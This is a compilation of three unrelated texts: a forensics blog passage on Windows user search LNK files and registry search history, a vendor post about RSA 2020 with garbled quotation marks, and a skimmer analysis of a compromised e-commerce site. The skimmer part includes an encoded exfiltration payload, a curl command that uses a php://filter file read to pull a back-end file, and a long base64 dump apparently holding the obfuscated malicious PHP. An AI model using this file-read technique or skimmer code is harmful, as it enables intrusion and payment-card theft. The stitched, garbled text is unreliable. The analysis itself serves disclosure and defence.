12   bbb                           
11   aaa                           
10   *.cfg                         
9    apple                         
8    dni                           
7    private                         
4    gov                           
5    air                           
3    intelsat                      
2    adhealthcheck                 
1    *.ps1                         
0    global

Figure 5: WorldWheelQuery key extracted from the user’s NTUSER.DAT registry file

Via the WorldWheelQuery registry key, we identified passw as the second most recent term in the user’s Explorer search history according to the MRUListEx order. MRUListEx is a registry value that lists the order in which other values have most recently been accessed—essentially, the order in which terms were searched in Explorer. passw also matched the filename of the unusual LNK file that contained the string Search Results in Local Disk (C:) (see Figure 3). These details seemed to suggest that LNK files were being created as a result of user Explorer searches. Therefore, we’ve started calling these “user search LNK files”.

Nuance and Interpretation

After searching the system for LNK files with the terms listed in the user’s Explorer search history, we found that not all terms had associated user search LNK files. Figure 6 displays LNK files and their accompanying file creation and modification timestamps that we identified as a result of this search. Note that while we found 15 searches via the WorldWheelQuery registry key, there are only four (4) user search LNK files.

2019-11-09 08:33:14    Created Modified
C:\Users\<user>\AppData\Roaming\Microsoft\Windows\Recent\gov.lnk

2019-11-09 09:29:11    Created
2019-11-09 09:29:37    Modified
C:\Users\<user>\AppData\Roaming\Microsoft\Windows\Recent\private.lnk

2019-11-09 08:38:29    Created
2019-11-13 06:47:56    Modified
C:\Users\<user>\AppData\Roaming\Microsoft\Windows\Recent\passw.lnk

2019-11-13 06:57:03    Created
2019-11-13 06:57:25    Modified
C:\Users\<user>\AppData\Roaming\Microsoft\Windows\Recent\Secret.lnk

Figure 6: LNK files with associated WorldWheelQuery Explorer search terms

Additionally, we noticed pairs of LNK files created at the same time that had similar names. As an example, Figure 7 lists two LNK files that were both created at 2019-11-09 08:38:29 UTC.

C:\Users\<user>\AppData\Roaming\Microsoft\Windows\Recent\passw.lnk

C:\Users\<user>\AppData\Roaming\Microsoft\Windows\Recent\password.lnk

Figure 7: LNK files created at the same time

After further testing, we determined that the system created user search LNK files as a result of Explorer searches where the user opened one of the files produced as a result of this search. User search LNK files were not created if the user did not open a file returned by the search.

In this example, the password.lnk file contained target file metadata, as would be expected for LNK shortcut files, and referenced a target file named password.txt located in the T:\ directory. passw.lnk, as previously discussed, only contained expected metadata for a user search LNK file, including the absolute path Search Folder\passw with reference to Search Results in Local Disk (C:). However, this discrepancy in directory—the user search LNK file search context of Search Results in Local Disk (C:) and the LNK shortcut file located in the T:\ drive—is actually as expected.

LNK shortcut files contain metadata for the most recently accessed file, and we found the same to be true for user search LNK files. Based on differing creation and modification timestamps for passw.lnk, we know the user searched for passw in at least one other instance (we’re not able to conclude whether a search happened between these two points in time) and opened a file from the search results. This is seen in the timestamps for the passw user search LNK file in Figure 8.

2019-11-09 08:38:29    Created
2019-11-13 06:47:56    Modified
C:\Users\<user>\AppData\Roaming\Microsoft\Windows\Recent\passw.lnk

Figure 8: passw.lnk creation and modification timestamps

The second occurrence of a search for passw occurred on November 13, 2019. In this instance, the user again searched for the term passw using Windows Explorer search, but this time searched within the context of the C:\ drive (Search Results in Local Disk (C:)), and subsequently clicked on a document named password2.txt. The results from LECmd for password2.lnk can be seen in Figure 9 (some information omitted for clarity and to protect client information). Notice the information embedded in user search LNK files is also embedded within the LNK shortcut file that is created simultaneously with the user search LNK file (underlined text). The search context for passw.lnk and full file path location for password2.lnk both match: C:\.

LECmd version 1.3.2.1

Author: Eric Zimmerman (saericzimmerman@gmail.com)
https://github.com/EricZimmerman/LECmd

--- Header ---
  Target created:  2015-11-09 22:14:10
  Target modified: 2010-01-11 16:57:11
  Target accessed: 2015-11-09 22:14:10

  File size: 19
  Flags: HasTargetIdList, HasLinkInfo, HasRelativePath, HasWorkingDir, IsUnicode, DisableKnownFolderTracking
  File attributes: FileAttributeArchive
  Icon index: 0
  Show window: SwNormal (Activates and displays the window. The window is restored to its original size and position if the window is minimized or maximized.)

Relative Path: ..\..\..\..\..\..\..\<file path>\password2.txt
Working Directory: C:\<file path>

--- Link information ---
Flags: VolumeIdAndLocalBasePath, CommonNetworkRelativeLinkAndPathSuffix

>>Volume information
  Drive type: Fixed storage media (Hard drive)
  Serial number: <serial number>
  Label: (No label)

  Network share information
    Share name: \\<hostname>\<top level folder>
    Provider type: <provider type>
    Share flags: ValidNetType

  Local path: C:\<top level folder>\
  Common path: <file path>\password2.txt

--- Target ID information (Format: Type ==> Value) ---

  Absolute path: Search Folder\passw\password2

  -Users property view ==> Search Folder
  >> Property store (Format: GUID\ID Description ==> Value)
      d5cdd505-2e9c-101b-9397-08002b2cf9ae\AutoList  ==> VT_STREAM not implemented (yet) See extension block section for contents for now
      d5cdd505-2e9c-101b-9397-08002b2cf9ae\AutolistCacheTime  ==> 1849138729510
      d5cdd505-2e9c-101b-9397-08002b2cf9ae\AutolistCacheKey  ==> Search Results in Local Disk (C:)0

  -Variable: Users property view ==> passw
  >> Property store (Format: GUID\ID Description ==> Value)
      1e3ee840-bc2b-476c-8237-2acd1a839b22\2      (Description not available)         ==> VT_STREAM not implemented
      1e3ee840-bc2b-476c-8237-2acd1a839b22\8      (Description not available)         ==> passw
      28636aa6-953d-11d2-b5d6-00c04fd918d0\11     Item Type                           ==> Stack
      28636aa6-953d-11d2-b5d6-00c04fd918d0\25     SFGAO Flags                         ==> 805306372
      b725f130-47ef-101a-a5f1-02608c9eebac\10     Item Name Display                   ==> passw

  -Variable: Users property view ==> password2
  >> Property store (Format: GUID\ID Description ==> Value)
     49691c90-7e17-101a-a91c-08002b2ecda9\3      Search Rank                         ==> 0
     28636aa6-953d-11d2-b5d6-00c04fd918d0\25     SFGAO Flags                         ==> 1077936503
     28636aa6-953d-11d2-b5d6-00c04fd918d0\32     Delegate ID List                    ==> VT_VECTOR data not implemented (yet) See extension block section for contents for now
     28636aa6-953d-11d2-b5d6-00c04fd918d0\11     Item Type                           ==> .txt
     28636aa6-953d-11d2-b5d6-00c04fd918d0\24     Parsing Name                        ==> password2.txt
     446d16b1-8dad-4870-a748-402ea43d788c\100    Thumbnail Cache Id                  ==> 7524032674880659487
     1e3ee840-bc2b-476c-8237-2acd1a839b22\12     (Description not available)         ==> Null
     1e3ee840-bc2b-476c-8237-2acd1a839b22\20     (Description not available)         ==> 1
     1e3ee840-bc2b-476c-8237-2acd1a839b22\3      (Description not available)         ==> document
     1e3ee840-bc2b-476c-8237-2acd1a839b22\17     (Description not available)         ==> {1685D4AB-A51B-4AF1-A4E5-CEE87002431D}.Merge Any
     1e3ee840-bc2b-476c-8237-2acd1a839b22\8      (Description not available)         ==> C:\<file path>\password2.txt
     b725f130-47ef-101a-a5f1-02608c9eebac\4      Item Type Text                      ==> Text Document
     b725f130-47ef-101a-a5f1-02608c9eebac\10     Item Name Display                   ==> password2
     b725f130-47ef-101a-a5f1-02608c9eebac\12     Size                                ==> 19
     b725f130-47ef-101a-a5f1-02608c9eebac\14     Date Modified                       ==> 01/11/2010 16:57:11
     006fdbaa-864f-4d1c-a8e8-e62772e454fe\11     (Description not available)         ==> 59
     006fdbaa-864f-4d1c-a8e8-e62772e454fe\13     (Description not available)         ==> 1077936423
     cf5be8c0-236c-4ad3-bace-cd608a2748d7\100    (Description not available)         ==> True
     e3e0584c-b788-4a5a-bb20-7f5a44c9acdd\6      Item Folder Path Display            ==> C:\<file path>

--- End Target ID information ---

--- Extra blocks information ---

>> Property store data block (Format: GUID\ID Description ==> Value)
   (Property store is empty)

>> Tracker database block
   Machine ID: <hostname>
   MAC Address: <mac address>
   MAC Vendor: VMWARE
   Creation: 2019-11-13 04:29:24

   Volume Droid: <volume>
   Volume Droid Birth: <volume>
   File Droid: <file>
   File Droid birth: <file>

Figure 9: LECmd.exe output for password2.lnk

The takeaway here is that user search LNK files are only related to the search term and not search context. This means later searches for the same search term, e.g. passw, when the user subsequently opens a search result, but in a different drive or directory changes the modification timestamp for the user search LNK file as well as the search context contained in the user search LNK file. This keeps in step with LNK shortcut files, which are dependent on a simple filename—not the full file path.

Timestamp Interpretation

Historically, due to the structure of the WorldWheelQuery registry key and available timestamps in the Windows Registry, investigators could only determine the search time of the most recent term using the last modification time of the registry key. With user search LNK files, new timestamps are available to determine the times a user searched for a specific term when the user subsequently opened a file from the search. Going further, we can combine evidence from the user search LNK files and the WorldWheelQuery MRUlistEx registry key value to infer the order of searches completed by the user. For instance, since the user searched for gov (WorldWheelQuery search index 4), passw (index 6), and private (index 7), we can infer they also searched for air (index 5) but didn't open any files resulting from this search.

Conclusion

LNK shortcut files have been a reliable method to determine user access to files and the associated file metadata at the time of access. With user search LNK files, we can now enrich our Windows Explorer search history findings and gain a more detailed picture of user activity through additional timestamps of user Explorer searches with subsequent access to files from the search.

Acknowledgements

Thank you to Phillip Kealy and William Ballenthin for technical review and providing feedback on overall presentation.

RSA 2020 and the Human Element of Security

RSA is fast approaching, and as we here at Veracode are busy prepping for our trip out to San Francisco, we have been thinking about the theme of this year???s RSA conference ??? ???the human element??? ??? and what that means for us and for application security.

The RSA Conference website explain that the ???human element??? theme this year highlights that ???the actions we [security] take can affect every aspect of humanity. We???re the ones on the front lines, protecting not just data, but our most vulnerable people and every aspect of our lives.??? Coincidentally, we just published a compilation of Veracode customer profiles, Spotlight on Companies Changing the World: How Software and Security Are Transforming the Way We Live. This compilation highlights the fact that Veracode is not just securing software; our customers are changing the world and making a positive impact on communities and lives with software, and we???re partnering with them to protect and support those initiatives. As software increasingly touches every aspect of our lives ??? from healthcare to education to government ??? the security partnership becomes more and more critical, and we take that very seriously.

There are human elements in what we are protecting, but there are also human elements in how we are protecting. We spend a lot of time talking to our customers and prospects about the fact that effective application security requires more than technology ??? here are some of the AppSec ???human elements??? that play a critical role in successful programs:

Collaboration Between Security and Development

As application security has ???shifted left??? earlier in development cycles, security and development teams need to understand each other and work together more than ever before. A recently published Securosis report titled, Building an Enterprise DevSecOps Program, sums it up well:

???Most security practitioners come from a network security background, and many CISOs we speak with are more risk and compliance focused, so there is a general lack of understanding of software development. This lack of knowledge of development tooling and processes, along with common challenges developers are trying to overcome, means security teams seldom understand why automated build servers, central code repositories, containers, Agile and DevOps have caught ?ャ?re and have been widely adopted in a very short time.???

The report goes on to advise security professionals:

???You need to consider how you can improve delivery of secure code without waste and without introducing bottlenecks in a development process you may not be intimately familiar with. The good news is that security ?ャ?ts nicely within a DevOps model, but you need to tailor things to work within your organization's automation and orchestration to be successful.???

Bottom line for security professionals: Get to know and understand your development teams and their pain points and priorities. You won???t be able to effectively secure their processes without this understanding. In addition, consider adding developer security training to the mix. Most developers don???t have the security skills or know-how they need to code securely ??? it???s simply not taught in the vast majority of universities, or offered on the job. Work to understand their processes, and enable them to understand yours. Our guide, The Security Professional???s Role in a DevSecOps World, is a good starting point.

Security Champions

Another low-tech, human AppSec element that???s been coming up in customer conversations recently ??? security champions. In the report referenced above, Securosis analyst Adrian Lane writes, ???I spoke with three midsized ?ャ?rms this week ??? their development personnel ranged from 800-2000 people, while their security teams ranged from 12 to 25. They typically had two or three security personnel with backgrounds in application security They may be rare as unicorns, but that does not give them magical powers to cover all development operations, so they need ways to scale their experience across the enterprise. And they need to do it in a way which meshes with development objectives, getting software development teams to implement their security controls.??? He goes on to say, ???One of the most effective methods I have discovered to scale security is to deputize willing developers with an active interest in security to be ???security champions??? on their development teams.???

Security champions are like security force mulitpliers on development teams. Security champions don???t need to be security pros; they just need to act as the security conscience of the team, keeping their eyes and ears open for potential issues. Once the team is aware of these issues, it can then either ?ャ?x the issues in development or call in your organization???s security experts to provide guidance.

Visit Us at RSA

Let???s continue the conversation at RSA. Stop by our booth, N 5553, to see a product demo or chat with one of our experts. See this web page for details on our speaking sessions, and on how to schedule a meeting with one of our execs. Hope to see you there!

Uncovering New Magecart Implant Attacking eCommerce

If you are a credit card holder, this post could be of your interest. Defending our financial assets is always one of the top priorities in the cybersecurity community but, on the other side of the coin, it is one of the most romantic attacks performed by cyber-criminals in order to steal money. Today I’d like to share the analysis of a skimmer implant spotted in the wild. So far I am not sure hundred percent that the discovered implant would be an evolution of Magecart – since the activation scripts are quite different even if they do use Magento core infrastructure. We might be facing a new Magecart version or a new framework as well for my current understanding, notes suggestions are always welcomed.

Disclaimer

National law enforcement units have been alerted, few hours are gone after they gave me the authorization to publish this POST. Please if you used your credit card in one of the following eCommerce (IoC section) consider your credit card as a no more private card: call your bank and follows the deactivation steps. Since C2 and Relays are still up and running, in order to avoid replication, the addresses have been obfuscated. I want to thank Daniele B. for giving me the first “wired eCommerce”

Analysis

Everything starts from a vulnerable eCommerce web-site. The user don’t feel anything weird since she would normally get items into her web-chart, surfing from page to page watching and selecting items and finally deciding to check them out by register a new account or just as proceed as guest user. However the attacker could abuse the eCommerce vulnerabilities introducing a nasty javascript sending out information (for example: Name, Address, eMail, credit card number, cvv, expiration date, and so on) to another host, belonging to the cyber criminal. The following picture shows the point.

Fig1: External Connection outside the eCommerce Perimeter

From Fig1 we see an alien connection (HTTP POST) to an external source: https://*****.]com/js/ar/ar2497.%5Dphp . This POST carries out a quite interesting payload as partially (avoid info_leak) shown in the next code section.

touch=86f63747d33786f607e237f62656c6164786f6d656e236f6d662e657d6265627d3431343431333831333737383930303136256870713d3236256870723d32303235362366767d3736353626696273747e616d656d3a4f686e6164716e662c6163747e616d656d3259667965627166216464627563737d35452230366f657e6471696e652230377169752233452230313236236964797d364275637e6f6623747164756d3132362a79607d393336353036236f657e6472797d35535620786f6e656d3535393d2233373d283836256d61696c6d3a686f6e6164716e6524303279636b696e236f6d66257167656e647 .....

The encrypted/encoded data lands to an external gate hosted on *****.]com. This is a slightly difference behavior if compared to the original Magecart which used to send data directly in base64 format. Mykada looks like a legit eCommerce website that could be compromised and used as a relay (one more difference from Magecart). A further investigation on such a rely shows a magento core installation (this is a common indicator to Magecart) which includes the js/index.php (ref: https://github.com/integer-net/GermanStoreConfig/blob/master/src/js/index.php) providing a nice tool to dynamically building-up a composite javascript file for performance boosting and compression rates. By using such a public magento-core functionality and by guessing file paths (looking for known public folders on the host would help you in guessing paths) we might obtain the original malicious back-end file injected from the attacker.

curl http:]//*****.]com/js/index.php\?f\=php://filter/convert.base64-encode/resource\=/home/****/public_html/js/ar/ar906.php

The result follows:

PD9waHAgCmlmKGlzc2V0KCRfR0VUWyd0b3VjaCddKSkKJF9QT1NUWyd0b3VjaCddPSRfR0VUWyd0b3VjaCddOwoKZXZhbChnenVuY29tcHJlc3MoYmFzZTY0X2RlY29kZSgnZU5xTld2dFRFMWY3LzFlMmpETWxnSEYzazAxQTNyd2RMd2hhQk9VaVF1TXdtODBKaVd5eStlNXVnTkRwYUR1b1dLd2RwZDZtdjloUjI2b0Z4UmxrbkU1bkxGcXNVclZlS2xwdC9WZStuK2VjVFVnQ3lvc1Njam5uUFBmUGN6a3hUTjF4cFA1VFp6OS9mdUxUckowYTBsMG1PYTd1cG94MS9STXZqMDgrdU5TNG9XYXphVm54VENxelg5OG9iWmZNbERFbzVhMmNMVEhkTnEwWXE1UDBURnpLWmVLV2VIdFlkNDJrdjJhRE9FZEs1REtHbTdJeVV2L0MxQisvVFYxOGRLdDZYZjhQeDY1ZGZUdjkvZEtNNzlOVW92b0RoNW1KalJzTEpIMGJ4ZXYrcDdNblp2NzQ2OERNaFdvZjJPalViVDJwTkNRTXNKSEdUNTFrRGVwNUVHS1plQ3JSYURNM1oyZWsyS2JPcGxDd1A4NjJ0TWVicXNzUC9xU0U4RDVmNDJlVm9ybjZJSU1NVWxiUHVJNWtKUkoxMG9DZHk3aXB6QURFeG1lNjVOcVdhWUptdWJKS2hDemgrZE55NmhIZHR2VjhkVlgvN0tFTEU1OS9YeFg1YjFXOHVVSHBqY29oZFNBcWg3V3F1cXIrZjJiK2pvN0VZaGZ4YWJuRXZVeFBjdTJEalpRcjJWWnVnSlJjdFZ0dHlNV2JvNG9haW82RXRmaVc2RWhBaVk1b1duUWtwTzNkakVjanFpaGgvRzNZTE9OOWZXOVNibFdUZUJwU2U0YkQyNXZick42OTBaR2dqdDE2SHhiVTcyNklLc0VnM3RQVXFFTG5CQTA4RHc1RWlMMW9RRlhHeDhlWGlQbmRJQnB1MjkrM3QyMFVKSUo0cGJWRmxWQW9sdW5JeDFTY0YzWjM5NHc0UkFsTUJYQXFma1BCcmg1aVZzWkxwUm1rdElDQjdWb1lyOFBkSUtaQkV3cFcwSG1oTGNNREhmS2U3bGE4SDlpOHF6dXF5S0dPSFYyeTFrVzgzRDBmVllQYTdmbW9xb1Rtb2lQMURkZVh1UUpSSFl4RmxiRGEydDAyRk11UU9Qa1lxVm93aHRmaEVTY1dNRnc4VXdLa0FiT3ZlUStwRWlwTGdodTFaV2RvZTB0SFBrNEhrbkJjQVdjdmpEMDY5Q0Fha0lPTHAzN2s5SHFFQ2pnWkNCTEMwakpLcEFLY0JrcGRnUjFRQUxlQ2F1YmFVeEJIK1Q4NjlNdWIwQ3RzWktoUk5ZRFA2K056YjdnRGxMdW5rOVpGNkVsdWtvSXdabGt1K1g4VnpvZ3FBUnhRSDN6OTlaWFR6MytJcXBwR3pJR2VxcEJyd1FCeGI5WEM3VWRUSUtYVDcvUzNLL3lzUFNubDRXcDFvS0c3VW9JeDA1RUd3QVhSMlRFUTRVbzRkaElFQWc4dlIwY2FJR1M5UXFSMjdSYWZIWi82OCs2SlAzLzhkd1gvbmNSOVhlRlBuakdtNjhsazB1Ty8vL2wzYzlGQUlEZzUvcHBPNitwcENPblFYRzludmRKS3h0dzA4UEUyOHN0c0xFMm1IS0xuMERFWkxqN1FaZTRlYU92RVN6aE5XRzdQNDAwVkQ2SGdmdTVaOE95ZEtYd1VDbi9jU1IrMVFBMHFkeE03bHEvUHczazFtQ0xZUlB2aStBMDJrZVhvUlNjQ0tFakJReUZWdjhQc1N6Y0VXMGZGc25CREswNVhONVdvOXNGWEwwN0JOV0RCaG9iVkRKZ21mSEdzTkpOY1MzZGNqcHNNV2tZOEEyd0VlZ0tRL1ZJcmZkTCtJZjRPTWtlSzVWeVg0UlBUbEZJWnNjcXdvVVcvdEJNd1NBb2tiU0NZNUpDSEp0d1NSdzlNL1hvR1lLS0NKZkFmRDZ5d05ia1NCeFN5OVVjNFIyOXVHSTF6aVFwNE5IYnZLWTVRdnZ1T3JCTEw3SEVocDBJbUNPVzUxZTdmT3ZQN1NSd2UvM1Z1RllHemNCOGhjRXpQNEo5RHpQYnRUUTZUQ25jVEhjN3B6T3M1QkxGTVVVVmthTUZPd2dQaFVSZFBqOFBkZ3RFUlBYUUJsQkxrSnRkb1hTL0JTcC9xS2Y5bmVHTDk5M08zVi9Ib09tbVluRm0zR1JkNXdNcGtkQW5wYWpqbEppRzc1VEFTdmkvTjBSS0dOUVJlcVhDU2tFWUM5eWdtUno4VlVScFFBOGNYNXFlUG5iOURQRkJvTjI4YmpUY1Q0TmJIQ051MGd1NStQVXlvQkw2MVMyL3ZVSVN2ME5BQWN5VW9KOHYwVE02RjNYZUpKMUxDdHRKZ2pOUm1tbG5kSGlTOTlmWjBEQnJwUGFQR2NLUkFnWUlQTGgrZW5Mb3cvK2dHQnhDRTVBb05lTWVTa0wycUNlRmt0cHVPOENCZFVTN2NnMmlCY3dzblBaRUNnUTc0dGh3WDNxOFY0S1AvMm0vMy83MDQrVEtxaHJUenRKU2xzU3c0VEI5OWpqZVZHMWNQaXhPUWcrQ0hEWlNNS0Iwd0FRNGNwQUtCd093LzkwZzFNVnByRU9EV0QxR1dTSGR6aHM2L2hNcVV4Vm51Q2oxS1V1OFo1dS9mbkh0ODdjYzMvTzNPYlIzZDNkc2E5blRMZXpyM3l0dGF5RmJkV3JkUVNRTmNKUlo2eVQwS1hnLzVBbU40VUZkby8yT1drWnJ0VkNMQjh0SU8yMDhwbG40OFVPb0NTMnlQQ3ljTFVRb1EvdjRqV0lzZC9BY3dIWGgxWVlXZWUwcTl6TlhOUVNvYzlKaVY0OEhWMFV5cHplM3RNU2xUOCtpNWV3Q015Y1RjeWNjOHduWXJoRTA5OU9IRUlsUVVqcXJod0pXdnI2eU1yUS9Ua3BObEdiY09ZYlkvbDg3Q240Y3p3QWZYNG80RHY0RlVCQ05PMnVLVlMwSjNrUzJveWtuYTFqQUtDR1BRa2NBdnJUWjAxeEU0b3NLYnlVSDZDcG1EMjIxRVN4eUQ1UEVYQjhtTi83MUVyTFlTU0lvSS9lZmdyVCtlUXQrQlpldnp5aUZrOE96ZkxLcVFrTlpIK1JqYjVMVE9hNDVpMkpTbVdDTDI0TzRGRGx5cUdweUh3OGhldElmaXBMb0Fsc3NFeWthdWo3Q2REblI2a2V6QmRvd1RScG5nOW5uNTZNSENPWlFKSVhnbnBhb2crZm1yR2U1RHpRME9wZUxtUFhuUE5hY0p0N0ZJdS80UVVCU2lSZHNwUjBjSzdrK3U5QWlNZ1drOS9PaklDdnQzSlZPT2hQK09tOHVtZU1ic1RadE9qS0xJRkx4bWllMVl6N1pzYkpOZzd3MmgxaXNxcS9DclBiejhKeGVWZGpYVEZ1Z3JPeHB2MldHS2xJWGlBR1laOGJRRWRrTVVSaFNPZDYvZkVrcnlGQTkxQitnSTJqZWFIWTRGMm1TQ1M3VmhrTjd4ZFBQdG8vSEYrL0JscFdDMk5OY3ZZWnJIOHlncE4wL09FSTVucWFnTFFMdEJwT2JkQlZOTi9nRTJBbytCMEtFaUF5YXZlRWlBMGV4K2ZXK0h3Q28xRktKTUVmdCtDYTdDWVd0bGplQmFHU1p0c2N3NG5ySWhKbTNLT2FpK3BZSFVFUEpnMmt1ZU1jYnNvbktiemFKblpmZkhBcFNaY3ZFV1VkR0NXYVJ0MVJ3ayt2UGZnTHBlVDBubStZM2JLOVVzRjZxQ0VjSTB3QklBY0FqVkJnRzZaLy9udjV5QXZoUFRFeThnYzNoMmdxc054UUVTZ0w1VjVpbzlkK1g0RlhoSWVPWWhSUFgwcXFnRUpjUlowcXVTU0hFelkvZklLUmRmSCtHVldwcmtDQmVxcUJkUDV1OHRQS0lQdWdkcFl4dVY0SlRmTzdhUlNBQzJZS2lKbmdjYlJOVjErZFE5RUF6KzloZnQwVnM2Wk9Td1lQM09VR3UrZ1NCTUM4ZE5nME95WXFUYlNFQlJzdU5rcFZXTko2bnMxVFJDNFFEWDNSQnJHZVFISDVwRi9JVy9nTmo2d3ExSjNyT2t0MUhKcERSblIvZUtLamNZeXU5YVR1YVVKTzljaERlSDVwWUkzZTUvNlFWVHVhbDdkRXJDUFRaelhKT1ZHSjZRc3AxRGkwaHlhTk0rUTR1WWNoem1scC9RNjFXUWhOWm9LWGUxZDNaOUlscFp0STdGWHBQcmVqYXF5aHB2dW56N2ZMNk5MVTJidGpiWjFhc3NwdjdyNTR0VlBsOWprdWxibXpwV1hmT0VkMEMwQnVldzFkZmNoYS9KbFBwdlUxWStQbmNVVGlHTFBYcDg5WE1KZ3M0Q3F3TFVZZHlsOXNKWDJmWnVTQTFrTEp2VmJGanVOOStjT0hqMGM0Zy91M1QyOXU5ZitqNWQxLy96ekpNakUzOHZYbDY0R25rSEZjU2Zlbk5wL3V4WGFETjhqUW5MeHY2bHQxL2R1M3htNmQ3dnM1RnFPUnlxWFM4cklSVVBzcUpXWkI3VUo0WmxvYTdqTmpNb1dCM2trR0VkNlVTS3BkRDhJKy9raDNscnZsNmlJOEloWDhVWW9ZZngyZ2NDSkhVYm1jcmhxY3BPeGRseUNuTnlHZGdjaDVReTl4K255MjVsbVdXQmNYQ0Vmc3FYMVViV3kxb2w1OExsakh5TTJmQXlTS2lGNVEwMVcxTzJtLzhZdlR3S2dqcXF0WkZKTXg4aUx6TFUyeEFrWnNYelV1TjZueEFHNXFtRlJFSEZoNzcrcDIvL1B2ckY5OGNpbmQyYndWYVJwN3BTVHVxZ2dFQ29qRXhQMGlwVUNSOTVLZ3FFZlkzcitoZCtQM0hwOVdURXliMzd1TnBxNk1kbnQrZmF0bGJML2tEWlQyM2xHNVVsQXdCMXdIS2xtR2xCMlVrOVpVTmVNOGNrbG1jTzFSSERsajBvb1ZxQkhVM0xoWW9xRC9TUk5Gb0lHZ2lxbkcrTjJGNTJPUCs3UEc1TTlLVlRWVDUvUVV4L1VYK05MQk9IRXhZbU9OMGRyZkVtdzRxejZ0S2pnUVBMVHYvZzV1M3BveGZLdlA3eHRTT3pCeVlqYkdSWHE3VzFhZFdZUkNTR2JqK2lPb1o2M3dlVXNxaVFxL0xWTFh0VFdmaUlnVTJsNzI2QzhyWkRmVU5VVmFFNGg2dWtrSlgyV3pFcHpreGtLcHZLUGdnazdkS3p1clREU21ZK2RLaHpTK2VsWm1ZUjF0blV0YTJNdS9WeVVBM1cwZ1BSTFBHWVh0U1RqcFdqYW82TjVQMVV4Y1VRUGxSbUR1c1oza1BnZk5Fd0dEQ2gxMHNhdXUydmpKOXlXWGJxaUFhUlZTMXN0N2tvZmtFdmFlVVEyZ2ExbmJsc21Td1VxN3lYMVRPU1pjZVpYYlBCU2ZXeDltM1ZCVHVRSWt1Y3RyWk1taFk5cVg4Z3RYOWNzNEdDYU82blArNWRHWHNjWVh0M21lMWIyYXFXTzNieWFzbTBnZXdseUh4U1NtV2ZyeEdKb2pQVjE4UVo4YzcxL2FjUU1aazRJaVpVK2hPdXJYeWpuRThnZ1BVQjRpYnVUZjh5RWh0eGJYMTkwOTZ1amsyU3Fkc0Q2TjFTbzZNNktuQzA4M0U3bGMyUzdYbGY2ZWc1Zy9sNUVKWFRRQUl5TEJvcTVsaWpHRjJXT3QwblJjNC84Ump2SnNacjVVb0FOYzA2S1pHeUhWN0I1eEc3WkMxSHo5ZEpWWnh4bXVDSWNyVEVkSFZTRXJWL1dzK1RCek16UzM1U1JTdFpSaHpEVVUrTW1CZzFHRVpLTngweDRlV0x1TXR4VW1reExJV2JjUmZ3UzUwV255TncvNUQycm04bDlmaEZUK1JhWERHT0pHYkUzR2tKZ3N2aGQ3dHdadFI5ZGg2OFp3WUFUM29zL3dIOFpOKytTTGZkR21kR080ZUZNZzExSURBSURGV3R0dmhRZ1h5TzBJVmVDTkE4SjQ1MUtBZkswYWZVRktXSWMvalMxTk94ejUrZmVnbnExNzVaUFBQaytzU1hKMytDSTA1K2Yrem8yMnZQM2k3OFFpaDA2OGJGaFgvbkQzcklVY1RxZUhXd0lWelArU3FSdHp1ZDl2djl2Y3dCTTk3bmxYL0wxbmR5NVgySXpCRWppQ0ZQSXlzSkQwVFNCTDRnWmgwbVphemhqNlF0T2oybFBqRko0YTBEOUJuSWNWTlNFNWpLRE9KVFdKdFB2WFdLOTJHWWtRRERWMW1zTmRNQUVKa2ZubDNjUUcwdEhERGhNcmhGR3Q3c29rUUhGNmdOQmtzY2hwTkFaQXpSMEV2NEMyY1NaRnc3eHpiVTFOUmtpVlA4M1ZEbjJiTWJDbE9DdGZ3LzUyVlpDU1NQYnFZdGgyaG5VaWc4NGlMY0lIeFJBcWtsWjl0NW9CWmNKd0gvWmQ3QjdkM0lta3FndHZCL2haeUVlNFpPMlQvSlQ2REJwOUN2eDI1ZFNmcFZOVlh6YXl2YmNvc2pQZW9mc2dPTmwzSURTVmhZTEMvL3d4a29VY0NxV1V0VlFvV1pxcTlBbnpTa3lYSkRMVDNnbE5VMlB2OXU3ZzJOVXlscGE1cjZEbGRDZElMYmhBMUVRblFpYVlGcEt0eFFrOGhBSFZVSkJzdEZiSUZROFZTY3gvRWdlVnJOaHNoL2wzWFR3WUZXYVZpaEdWcE1RK3VjeUZ1ZW1wbHVVL1l5dUxONkxIbXB6RE1uOGJwZE1tbFNscWNMRlh3czNHdFlOd2Z4d2tIUlNBa3htM05Md29GUFE2ekN0TlJLSkJqOFQ0K1pISkZYY3JmSkc5cllURWUxQjBlbDZqU2pPMjVlWU5CSDNMS29jSk9vbjNpaEs4aFlReXhUUExCRXY1WmxKY1VnblZoelhKYmxkUlVTODdKa0loSzVQNXZTTUJQallDcW5BWnE2blNhMUlPOFNkWThDN0N5SHdqSVZybkpGT2xpMkovcGxNU2NXMVFBTmU2dzBiQVFuVUZWTmxMQnFlVXp4dTZVNnpzcXdyWXNVUm9BeXpGQUEyN3pzRUtxblJxc0UwdVJhL3Q5WEo2T1hWQ3JORFFQRGwxQklaZ1lnSy9xOGxGTmlJRktMbFdVZW05YUlkNGM0bXNxU080b0x1RUpjaThva2lSVithWlBEeDhvWmhqenNNcjRiUVlyRVpTUVpRNkRUbE4zU2FSQW1NY054ZFNQdmw3cXdLSjF6dUNaRThiTGQxYzBVVmlGSE96cVNPRlhqL0VaTk5BRGNScFMrS1h0U3lqQlNnQ3dUQ0dOWlBESHhBc3lrVEpxSGdIcWN5RGtNV1QzdWNCYjVZSjFSaFZocUJXS09qYVJjUG9FRE1mN2hjdVQ1T2ZaU3Z4VFFLdm9GYjB5WHlCbURQTnlLSlExUWlNQmsrUmZHQ0dqVXZhRzRqZnlYZzkrS1NqTExiT1JBbHhHME1RZ0pyM1JxYXR3Qy9vSTNvRnRRcm5EcGJUVTFnNVNvWkErMnZLN0xJL0h1UG90SzJaMVdPcDNmQ1VVNkRqbHJ6b2FoU0VlODF4dGlDRFlLVFJwUW80SXJ5NmtiaXpuMWt5SzhBTU1WZjFpckxYbXNZSUFVeGt1MkFSMjFTWVk3ZElZTFNZbWY3L0R0aTVSVkQxb2xseUlvcURUbUpsKytLQkUxSGU5OENxekpha0NUd3hSaFliVWlNdHR5dEYyaTJvSlBzQ2c3V0NRL0hCWnd5T3NTUUFNWkh2RVpDcTVNU0RFVUtBUTBOdUVTMnVVaDVyZ0MxMnc5VGhuUTRSd0Z0V0FndUM5U3FyMWllVGx4OU1xUmJ5SUdTcWorVkZ1cXE2eUc4VFVhNkxqNm5TWVVhVzYvYm5lZ2NQRjIxQlVsSkdHbjd2N3k3OWpYRVNPSDFXeWthVXRobGE5WU9va1ZzSGMxejJob21UK3IxR3JLRVJlTEtiTEV1djdwRjk4ZS92VmhwTkRRRmFjWjd4cm0wQWlXbW9ENGkxTzN6MFZINGdZZjZ